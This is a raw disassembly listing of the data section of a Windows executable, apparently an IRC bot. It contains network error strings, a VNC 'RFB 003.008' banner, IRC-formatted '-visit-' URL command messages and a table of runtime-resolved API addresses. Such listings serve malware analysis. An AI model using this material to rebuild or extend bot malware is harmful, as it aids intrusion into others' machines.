aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41AF8F:loc_41B0F3�o
align 4
dword_43AC9C dd 234032Dh, 6974656Eh, 26F666Eh, 2202D03h, 65707954h
; DATA XREF: sub_41B243+A4�o
dd 25203A02h, 25282073h, 202E2973h, 20504902h, 72646441h
dd 2737365h, 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h
dd 7325203Ah, 2Eh
off_43ACE0 dd offset loc_412F4E ; DATA XREF: sub_41B243:loc_41B2AF�o
off_43ACE4 dd offset dword_4E414C ; DATA XREF: sub_41B243:loc_41B2A5�o
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41B243+5B�o
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41B243+48�o
align 10h
unk_43AD00 db 2Dh ; - ; DATA XREF: sub_41B302:loc_41B4BB�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 10h
unk_43AD30 db 2Dh ; - ; DATA XREF: sub_41B302:loc_41B4B4�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
dword_43AD5C dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h
; DATA XREF: sub_41B302+1A0�o
dd 4C525520h, 2Eh
unk_43AD78 db 2Dh ; - ; DATA XREF: sub_41B302:loc_41B495�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
dword_43ADB4 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41B302+18C�o
dd 64657469h, 2Eh
dword_43ADD0 dd 2A2F2Ah ; DATA XREF: sub_41B302+3B�o
word_43ADD4 dw 4 ; DATA XREF: sub_41B55B+10�r
align 4
dword_43ADD8 dd 6325h ; DATA XREF: .text:0041B89C�o
dword_43ADDC dd 0DFFh ; DATA XREF: .text:0041B6EA�o
dword_43ADE0 dd 51FFh ; DATA XREF: .text:0041B6DF�o
dword_43ADE4 dd 0EBFFh ; DATA XREF: .text:0041B6D4�o
dword_43ADE8 dd 201h ; DATA XREF: .text:0041B6BF�o
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: .text:0041B6AD�o
align 10h
dword_43AE00 dd 3924EA90h ; DATA XREF: sub_41C2B8+4�w sub_41C2C2�r ...
align 10h
dword_43AE10 dd 173Fh ; DATA XREF: sub_41D055+D�r
dd 9875h, 9873h
off_43AE1C dd offset sub_41D124 ; DATA XREF: sub_41C164�r
dd offset nullsub_2
dd offset nullsub_2
dword_43AE28 dd 1B3Fh ; DATA XREF: sub_41D19B+D�r
dword_43AE2C dd 19930520h, 4 dup(0) ; DATA XREF: sub_41D61D+2�o
; sub_41D626+2�o
off_43AE40 dd offset sub_41C1A2 ; DATA XREF: sub_41E2C9+1C�r
dword_43AE44 dd 2 ; DATA XREF: sub_423D98+E�r
; sub_423DD1+46�r ...
dd 10h, 0
off_43AE50 dd offset off_43AE50 ; DATA XREF: sub_41F216+D�o
; sub_41F216+69�o ...
off_43AE54 dd offset off_43AE50 ; DATA XREF: sub_41F216:loc_41F296�r
; sub_41F216+89�w ...
dd offset dword_43AE68
dd offset dword_43AE68
dword_43AE60 dd 0FFFFFFFFh ; DATA XREF: sub_41F216�r
; sub_41F35A:loc_41F3A7�w
dd 0FFFFFFFFh
dword_43AE68 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: .data:0043AE58�o
; .data:0043AE5C�o
off_43CE70 dd offset off_43AE50 ; DATA XREF: sub_41F35A+15�r
; sub_41F35A+20�w ...
dword_43CE74 dd 1E0h ; DATA XREF: sub_41BBE2+185�r
; sub_41BEF3:loc_41BF2F�r ...
off_43CE78 dd offset word_43CE82 ; DATA XREF: sub_41C0CE+23�r
; sub_41C0CE:loc_41C12F�r ...
off_43CE7C dd offset word_43CE82 ; DATA XREF: sub_42686F+18�r
db 2 dup(0)
word_43CE82 dw 20h ; DATA XREF: sub_424FF8+18�r
; .data:off_43CE78�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_43D084 dd 1 ; DATA XREF: sub_41C0CE:loc_41C0D6�r
; sub_41C0CE:loc_41C11A�r ...
byte_43D088 db 2Eh ; DATA XREF: sub_420DB0:loc_4210A4�r
; sub_420DB0+311�r ...
align 4
dd 1
off_43D090 dd offset aNull ; DATA XREF: sub_41FF3F:loc_4202A3�r
; sub_41FF3F+457�r
; "(null)"
off_43D094 dd offset aNull_0 ; DATA XREF: sub_41FF3F+259�r
; "(null)"
byte_43D098 db 1 ; DATA XREF: sub_420749+E1�r
db 2, 4, 8
align 10h
dword_43D0A0 dd 3A4h ; DATA XREF: sub_420749+2F�o
dword_43D0A4 dd 82798260h ; DATA XREF: sub_420749+11D�r
dd 21h, 0
dword_43D0B0 dd 0DFA6h ; DATA XREF: sub_420749+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_43D190 dd 1 ; DATA XREF: sub_420749+3C�o
; sub_420C7F+C�o
dword_43D194 dd 16h ; DATA XREF: sub_420C7F:loc_420CB4�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
asc_43D2F8 db ' ',9,'-',0Dh,']',0 ; DATA XREF: sub_420C7F+19�o
; sub_420DB0:loc_421317�o
align 10h
asc_43D300: ; DATA XREF: sub_420DB0:loc_421207�o
unicode 0, <]>,0
align 8
dword_43D308 dd 14h ; DATA XREF: sub_421EC4+2�o
off_43D30C dd offset aExp ; DATA XREF: sub_421EC4:loc_421EE1�r
; "exp"
dd 1Dh, 427858h, 1Ah, 42C60Ch, 1Bh, 427850h, 1Fh, 427848h
dd 13h, 427840h, 21h, 427838h, 0Eh, 427830h, 0Dh, 427828h
dd 0Fh, 427820h, 10h, 427818h, 5, 427810h, 1Eh, 42780Ch
dd 12h, 427808h, 20h, 427804h, 0Ch, 4277FCh, 0Bh, 4277F4h
dd 15h, 4277ECh, 1Ch, 4277E4h, 19h, 4277DCh, 11h, 4277D4h
dd 18h, 4277CCh, 16h, 4277C4h, 17h, 4277BCh, 22h, 4277B8h
dd 23h, 4277B4h, 24h, 4277B0h
dbl_43D3E0 dq 1.797693134862316e308 ; DATA XREF: sub_421BFF+B7�r
; sub_421BFF:loc_421CE6�r ...
dd 0
dd 0FFF80000h
dbl_43D3F0 dq 1.797693134862316e308 ; DATA XREF: sub_421BFF+92�r
; sub_421BFF:loc_421CBE�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_43D408 dt 2.3562723457267347066e313 ; DATA XREF: sub_4220AC+D�r
; sub_4220AC+1F�r
align 4
tbyte_43D414 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_4220AC+31�r
align 10h
off_43D420 dd offset sub_422540 ; DATA XREF: sub_41D13C+F�w
; sub_41FF3F+3AA�r
off_43D424 dd offset sub_4221D5 ; DATA XREF: sub_41D13C+5�w
; sub_41FF3F+3E2�r
off_43D428 dd offset sub_42223B ; DATA XREF: sub_41D13C+14�w
; sub_420DB0+430�r
off_43D42C dd offset sub_42217B ; DATA XREF: sub_41D13C+1E�w
; sub_41FF3F+3CB�r
off_43D430 dd offset sub_422223 ; DATA XREF: sub_41D13C+28�w
off_43D434 dd offset sub_422540 ; DATA XREF: sub_41D13C+32�w
dd offset sub_424F1C
align 10h
dd offset sub_422DFC
off_43D444 dd offset sub_422DFC ; DATA XREF: sub_422E52+29�r
dword_43D448 dd 0C0000005h ; DATA XREF: sub_423638+A�r
; sub_423638+11�o ...
dword_43D44C dd 0Bh ; DATA XREF: sub_425D33+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43D4C0 dd 3 ; DATA XREF: sub_4234F7+58�r
; sub_425C06+C8�r
dword_43D4C4 dd 7 ; DATA XREF: sub_4234F7+5E�r
; sub_425C06+CD�r
dword_43D4C8 dd 0Ah ; DATA XREF: sub_423638+4�r
; sub_425D33+4�r
dword_43D4CC dd 8Ch ; DATA XREF: sub_4234F7+82�r
; sub_4234F7+8F�w ...
dword_43D4D0 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_41F8E3:loc_41F964�o
; sub_41FE2A:loc_41FEE7�o
dword_43D4D8 dd 2 ; DATA XREF: sub_423DD1+E�o
; sub_423DD1+28�r
off_43D4DC dd offset aR6002FloatingP ; DATA XREF: sub_423DD1+FC�r
; sub_423DD1+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 427B74h, 9, 427B48h, 0Ah, 427B24h, 10h, 427AF8h
dd 11h, 427AC8h, 12h, 427AA4h, 13h, 427A78h, 18h, 427A40h
dd 19h, 427A18h, 1Ah, 4279E0h, 1Bh, 4279A8h, 1Ch, 427980h
dd 78h, 427970h, 79h, 427960h, 7Ah, 427950h, 0FCh, 4349ECh
dd 0FFh, 427940h
off_43D568 dd offset dword_4DC020 ; DATA XREF: sub_423DD1+1B�o
; sub_42413E+55�o
align 10h
dd offset dword_4DC020
dd 101h
dword_43D578 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_42413E+72�o
dd 1000h, 0
dword_43D588 dd 3 dup(0) ; DATA XREF: sub_41FE2A+50�o
; sub_420CE6+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43D5A8 dd 3 dup(0) ; DATA XREF: sub_41FE2A+58�o
; sub_420CE6:loc_420D04�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43D5D8 dd 84h dup(0) ; DATA XREF: sub_42413E+9B�o
dword_43D7E8 dd 2 dup(0) ; DATA XREF: sub_42413E+69�o
dword_43D7F0 dd 2694h ; DATA XREF: sub_421861+3�r
; sub_4218B4+46�r
align 8
dword_43D7F8 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_424CFC�o
dword_43D810 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_424D12�o
dword_43D828 dd 2 dup(0) ; DATA XREF: sub_42600E+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43D988 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_42600E+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_43DAE4 dd offset off_427CEC ; DATA XREF: .rdata:00427EC4�o
; .rdata:00427FB0�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_43DAFC dd offset off_427CEC ; DATA XREF: .rdata:off_427D78�o
; .rdata:00427DB8�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_43DB1C dd offset off_427CEC ; DATA XREF: .rdata:off_427DC0�o
; .rdata:00427E04�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_43DB3C dd offset off_427CEC ; DATA XREF: .rdata:off_427E0C�o
; .rdata:00427E50�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
off_43DB60 dd offset off_427CEC ; DATA XREF: .rdata:off_427E58�o
; .rdata:00427E94�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_424F1C
align 10h
dword_43DB80 dd 2 dup(0) ; DATA XREF: sub_40111D+C8�o
byte_43DB88 db 0 ; DATA XREF: sub_40111D+62�o
; sub_401221+24D�o ...
align 10h
dword_43DB90 dd 0 ; DATA XREF: sub_401221+38F�o
; sub_401ACD+AEC�o ...
dd 5 dup(0)
dword_43DBA8 dd 0 ; DATA XREF: sub_401ACD+B48�r
; sub_415C40+60�r
dd 2D9h dup(0)
dword_43E710 dd 0 ; DATA XREF: sub_401ACD+5D8C�r
; sub_401ACD+5E61�r ...
dd 7Fh dup(0)
dword_43E910 dd 0 ; DATA XREF: sub_40B3BA+41�w
; sub_40B4F5+40�w ...
dword_43E914 dd 0 ; DATA XREF: sub_40B3BA+47�w
; sub_40B4F5+46�w ...
dword_43E918 dd 0 ; DATA XREF: sub_40B3BA+52�w
; sub_40B4F5+3A�r ...
dword_43E91C dd 0 ; DATA XREF: sub_40111D+C�r
; sub_4017ED+B9�w ...
dword_43E920 dd 0 ; DATA XREF: sub_40B4F5+75�r
; sub_40B6D6+2A�w ...
dword_43E924 dd 0 ; DATA XREF: sub_401221+3DE�w
; sub_401221+456�w ...
byte_43E928 db 0 ; DATA XREF: sub_4017ED+91�o
; sub_401ACD+5CD7�r ...
align 4
dd 1B89h dup(0)
dword_445750 dd 473Ch dup(0) ; DATA XREF: .data:off_43492C�o
db 0
byte_457441 db 3 dup(0) ; DATA XREF: .data:off_43902C�o
dd 0E306h dup(0)
dword_49005C dd 937Eh dup(0) ; DATA XREF: .data:off_432948�o
db 0
byte_4B4E55 db 3 dup(0) ; DATA XREF: .data:off_43165C�o
dd 0FBh dup(0)
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: .data:off_438E98�o
dd 5932h dup(0)
dword_4CB710 dd 0A18Ah ; DATA XREF: sub_40111D+FD�w
; sub_40B3BA+13�o ...
dword_4CB714 dd 1Ah ; DATA XREF: sub_401221+3D�w
; sub_401ACD:loc_404494�r ...
dword_4CB718 dd 0 ; DATA XREF: sub_401221:loc_4016FF�o
dword_4CB71C dd 20h dup(0) ; DATA XREF: sub_401221+495�o
; sub_401221+52F�o ...
dword_4CB79C dd 10h dup(0) ; DATA XREF: sub_401221+4AB�o
dword_4CB7DC dd 24h dup(0) ; DATA XREF: sub_401221+4C2�o
dword_4CB86C dd 0 ; DATA XREF: sub_401221+4B6�w
; sub_401221+546�w ...
dword_4CB870 dd 0 ; DATA XREF: sub_401221+4D5�w
align 10h
byte_4CB880 db 0 ; DATA XREF: sub_401955+28�r
; sub_401955+30�o
align 4
dword_4CB884 dd 0 ; DATA XREF: sub_401221+4E3�w
; sub_401221+4FA�r ...
dword_4CB888 dd 0 ; DATA XREF: sub_401221+49A�w
; sub_401ACD+8A2�r
word_4CB88C dw 0 ; DATA XREF: sub_401ACD+7BAF�o
; .text:0040AFA9�o ...
align 10h
dword_4CB890 dd 77C72C6Bh ; DATA XREF: sub_409909+4A7�w
; sub_409909+4EB�r
dword_4CB894 dd 77EBA994h ; DATA XREF: sub_409909+65�w
; sub_419C09+166�r
dword_4CB898 dd 7622A3F4h ; DATA XREF: sub_409909+80B�w
; sub_409909+880�r ...
dword_4CB89C dd 71C45229h ; DATA XREF: sub_409909+9D8�w
; sub_409909+A43�r ...
dword_4CB8A0 dd 71C24870h ; DATA XREF: sub_409909+98A�w
; sub_409909+A13�r ...
dword_4CB8A4 dd 77C71BB0h ; DATA XREF: sub_409909+48D�w
; sub_409909+4DB�r
dword_4CB8A8 dd 77D4808Bh ; DATA XREF: sub_409909+213�w
; sub_409909+234�r ...
dword_4CB8AC dd 71C4502Ch ; DATA XREF: sub_409909+9CB�w
; sub_409909+A3B�r ...
dword_4CB8B0 dd 77DE801Bh ; DATA XREF: sub_409909+372�w
; sub_409909+3C7�r ...
dword_4CB8B4 dd 77DDACABh ; DATA XREF: sub_409909+40F�w
; sub_41AF8F+11E�r
dword_4CB8B8 dd 77DE8075h ; DATA XREF: sub_409909+37F�w
; sub_409909+3CF�r ...
dword_4CB8BC dd 77DD7496h ; DATA XREF: sub_409909+3C0�w
; sub_4191DB+AD�r
dword_4CB8C0 dd 71AB1B7Bh ; DATA XREF: sub_409909+55A�w
; sub_40FAD6+115�r ...
dword_4CB8C4 dd 77E686CCh ; DATA XREF: sub_409909+72�w
; sub_409909+D2�r ...
dword_4CB8C8 dd 71C2498Bh ; DATA XREF: sub_409909+97D�w
; sub_409909+A06�r ...
dword_4CB8CC dd 77DDAB2Fh ; DATA XREF: sub_409909+3A6�w
; sub_409909+3E7�r ...
dword_4CB8D0 dd 7620E8C3h ; DATA XREF: sub_409909+859�w
; sub_409909+8AC�r ...
dword_4CB8D4 dd 77DD23D7h ; DATA XREF: sub_409909+2A5�w
; sub_409909+2F0�r
dword_4CB8D8 dd 76214750h ; DATA XREF: sub_409909+84C�w
; sub_409909+8A4�r ...
dword_4CB8DC dd 77E6D75Bh ; DATA XREF: sub_409909+B3�w
dword_4CB8E0 dd 7620BD61h ; DATA XREF: sub_409909+866�w
; sub_409909+8B4�r ...
dword_4CB8E4 dd 71AB60C9h ; DATA XREF: sub_409909+54D�w
; sub_409909+6D0�r ...
dword_4CB8E8 dd 77EBA6E9h ; DATA XREF: sub_409909+58�w
; sub_409909+CA�r ...
dword_4CB8EC dd 76D62A58h ; DATA XREF: sub_409909+934�w
; sub_413E10+11A�r
dword_4CB8F0 dd 76F36EAAh ; DATA XREF: sub_401ACD:loc_403ECB�r
; sub_409909+A95�w ...
dword_4CB8F4 dd 77E802FCh ; DATA XREF: sub_409909+A6�w
; sub_409909+F2�r
dword_4CB8F8 dd 77C75455h ; DATA XREF: sub_409909+480�w
; sub_409909+4D3�r
dword_4CB8FC dd 71AB12A7h ; DATA XREF: sub_409909+5F6�w
; sub_40C267+20�r ...
dword_4CB900 dd 71C574FAh ; DATA XREF: sub_409909+9BE�w
; sub_409909+A33�r
dword_4CB904 dd 71AB1746h ; DATA XREF: sub_409909+5E9�w
; sub_409909+754�r ...
dword_4CB908 dd 71C21CA3h ; DATA XREF: sub_409909+A0C�w
dword_4CB90C dd 71B28D0Dh ; DATA XREF: sub_409909+B50�w
; sub_40DC41+9A�r
dword_4CB910 dd 762211EFh ; DATA XREF: sub_409909+7FE�w
; sub_409909+86D�r ...
dword_4CB914 dd 77D902E3h ; DATA XREF: sub_409909+1B3�w
; sub_40B5B5+3D�o ...
dword_4CB918 dd 71C2FA86h ; DATA XREF: sub_409909+997�w
; sub_409909+A1B�r ...
dword_4CB91C dd 77DE1291h ; DATA XREF: sub_409909+38C�w
; sub_409909+3D7�r ...
dword_4CB920 dd 77E2C1B3h ; DATA XREF: sub_409909+399�w
; sub_409909+3DF�r ...
dword_4CB924 dd 73B81E3Bh ; DATA XREF: sub_409909+C85�w
; sub_409909+C8C�r
dword_4CB928 dd 71ABF628h ; DATA XREF: sub_409909+6AC�w
; sub_4111C0+D0�r
dword_4CB92C dd 71AB1836h ; DATA XREF: sub_40111D+1D�r
; sub_40111D+23�r ...
dword_4CB930 dd 77C72889h ; DATA XREF: sub_409909+4B4�w
dword_4CB934 dd 71C453F8h ; DATA XREF: sub_409909+9E5�w
; sub_409909+A4B�r ...
dword_4CB938 dd 77DD5C55h ; DATA XREF: sub_401000+51�r
; sub_409909+2B2�w ...
dword_4CB93C dd 77E96645h ; DATA XREF: sub_409909+7F�w
; sub_409909+DA�r ...
dword_4CB940 dd 77428B97h ; DATA XREF: sub_401ACD+5840�r
; sub_401ACD+781E�r ...
dword_4CB944 dd 71AB41DAh ; DATA XREF: sub_401221+8C�r
; sub_401ACD+5037�r ...
dword_4CB948 dd 762059A3h ; DATA XREF: sub_409909+825�w
; sub_409909+890�r ...
dword_4CB94C dd 71C4A1B4h ; DATA XREF: sub_409909+9A4�w
; sub_409909+A23�r
dword_4CB950 dd 1F7CD214h ; DATA XREF: sub_409909+C0E�w
; sub_409909+C3F�r
dword_4CB954 dd 77E09134h ; DATA XREF: sub_409909+2CC�w
; sub_418A2E+47�r
dword_4CB958 dd 77D4456Bh ; DATA XREF: sub_409909+22D�w
; sub_4126A7+40�r ...
dword_4CB95C dd 76D629BBh ; DATA XREF: sub_409909+91A�w
; sub_409909+92E�r ...
dword_4CB960 dd 1F7B9D96h ; DATA XREF: sub_409909+C28�w
dword_4CB964 dd 77E09070h ; DATA XREF: sub_409909+2D9�w
; sub_418A2E+4F�r
dword_4CB968 dd 71AB1740h ; DATA XREF: sub_409909+574�w
; sub_409909+6E8�r ...
dword_4CB96C dd 7620AFB6h ; DATA XREF: sub_409909+83F�w
; sub_409909+873�r
dword_4CB970 dd 77D5C13Ah ; DATA XREF: sub_409909+220�w
; sub_409909+23C�r ...
dword_4CB974 dd 77D45B19h ; DATA XREF: sub_409909+172�w
; sub_409909+1C2�r
dword_4CB978 dd 71AB157Eh ; DATA XREF: sub_401ACD+1DCE�r
; sub_401ACD+59F9�r ...
dword_4CB97C dd 71AB3E5Dh ; DATA XREF: sub_4017ED+C4�r
; sub_401ACD+50C1�r ...
dword_4CB980 dd 71AB14DCh ; DATA XREF: sub_409909+567�w
; sub_409909+6DC�r ...
dword_4CB984 dd 0CC0004h ; DATA XREF: sub_409909+8DB�w
; sub_409909:loc_40A202�w ...
dword_4CB988 dd 77DD590Bh ; DATA XREF: sub_401000+26�r
; sub_409909+28B�w ...
dword_4CB98C dd 71ABD755h ; DATA XREF: sub_401ACD+77AF�r
; sub_409909+69F�w ...
dword_4CB990 dd 77DF7311h ; DATA XREF: sub_409909+32D�w
; sub_409909+341�r ...
dword_4CB994 dd 77DDA2AFh ; DATA XREF: sub_409909+3B3�w
; sub_409909+3EF�r ...
dword_4CB998 dd 1F7CD927h ; DATA XREF: sub_409909+C01�w
; sub_409909+C37�r
dword_4CB99C dd 76206853h ; DATA XREF: sub_409909+818�w
; sub_409909+888�r ...
dword_4CB9A0 dd 77D4932Ch ; DATA XREF: sub_409909+206�w
; sub_409909+227�r ...
dword_4CB9A4 dd 77D5E310h ; DATA XREF: sub_409909+18C�w
; sub_409909+1D2�r ...
dword_4CB9A8 dd 76206B7Fh ; DATA XREF: sub_409909+832�w
; sub_409909+898�r ...
dword_4CB9AC dd 71AB1444h ; DATA XREF: sub_409909+624�w
; sub_409909+774�r ...
dword_4CB9B0 dd 77DD189Ah ; DATA XREF: sub_401000+5A�r
; sub_409909+2BF�w ...
dword_4CB9B4 dd 71AB3F8Dh ; DATA XREF: sub_409909+66B�w
; sub_409909+79C�r ...
dword_4CB9B8 dd 77DD5D20h ; DATA XREF: sub_409909+320�w
; sub_409909+334�r ...
dword_4CB9BC dd 71AB1890h ; DATA XREF: sub_409909+644�w
; sub_409909+784�r ...
dword_4CB9C0 dd 77C76B34h ; DATA XREF: sub_409909+44C�w
; sub_409909+4AE�r
dword_4CB9C4 dd 77D5E38Ch ; DATA XREF: sub_409909+199�w
; sub_409909+1DA�r ...
dword_4CB9C8 dd 77DDA20Bh ; DATA XREF: sub_409909+365�w
; sub_409909+3BA�r ...
dword_4CB9CC dd 76F36EEBh ; DATA XREF: sub_409909+AA2�w
dword_4CB9D0 dd 71AB12A7h ; DATA XREF: sub_409909+5DC�w
; sub_409909+748�r ...
dword_4CB9D4 dd 71AB1746h ; DATA XREF: sub_4017ED+3E�r
; sub_401ACD+5073�r ...
dword_4CB9D8 dd 77EBA595h ; DATA XREF: sub_409909+4B�w
; sub_409909+C2�r ...
dword_4CB9DC dd 77C7531Dh ; DATA XREF: sub_409909+473�w
; sub_409909+4CB�r
dword_4CB9E0 dd 77D4BDCAh ; DATA XREF: sub_409909+165�w
; sub_409909+1BA�r ...
dword_4CB9E4 dd 71C3516Ah ; DATA XREF: sub_409909+9FF�w
; sub_409909+A5B�r ...
dword_4CB9E8 dd 71AB32CAh ; DATA XREF: sub_409909+685�w
; sub_409909+7AC�r ...
dword_4CB9EC dd 71AB5690h ; DATA XREF: sub_401955+D1�r
; sub_401ACD+50D6�r ...
dword_4CB9F0 dd 1F7CB8F8h ; DATA XREF: sub_409909+C1B�w
; sub_409909+C47�r
dword_4CB9F4 dd 77EBB1E7h ; DATA XREF: sub_409909+3E�w
; sub_409909+BA�r ...
dword_4CB9F8 dd 77DD59F0h ; DATA XREF: sub_401000+45�r
; sub_409909+298�w ...
dword_4CB9FC dd 71AB5DE2h ; DATA XREF: sub_409909+651�w
; sub_409909+78C�r ...
dword_4CBA00 dd 71AB3ECEh ; DATA XREF: sub_409909+637�w
; sub_409909+77C�r ...
dword_4CBA04 dd 73B81B0Fh ; DATA XREF: sub_409909+C92�w
dword_4CBA08 dd 76204E4Dh ; DATA XREF: sub_409909+879�w
; sub_4167A0+4DC�r ...
dword_4CBA0C dd 0 ; DATA XREF: sub_409909+112�w
dword_4CBA10 dd 1F7D886Ah ; DATA XREF: sub_409909+BE7�w
; sub_409909+C22�r
dword_4CBA14 dd 71AB12F8h ; DATA XREF: sub_401ACD+2F9B�r
; sub_401ACD+5EB8�r ...
dword_4CBA18 dd 77C76551h ; DATA XREF: sub_409909+459�w
; sub_409909+4BB�r
dword_4CBA1C dd 77C729E2h ; DATA XREF: sub_409909+49A�w
; sub_409909+4E3�r
dword_4CBA20 dd 77C7212Fh ; DATA XREF: sub_409909+466�w
; sub_409909+4C3�r
dword_4CBA24 dd 71AB1AF4h ; DATA XREF: sub_401955+89�r
; sub_401ACD+50F3�r ...
dword_4CBA28 dd 77D5E303h ; DATA XREF: sub_409909+1A6�w
; sub_409909+1E2�r ...
dword_4CBA2C dd 71C4576Ch ; DATA XREF: sub_409909+9F2�w
; sub_409909+A53�r ...
dword_4CBA30 dd 77D4702Fh ; DATA XREF: sub_409909+158�w
; sub_409909+1AD�r ...
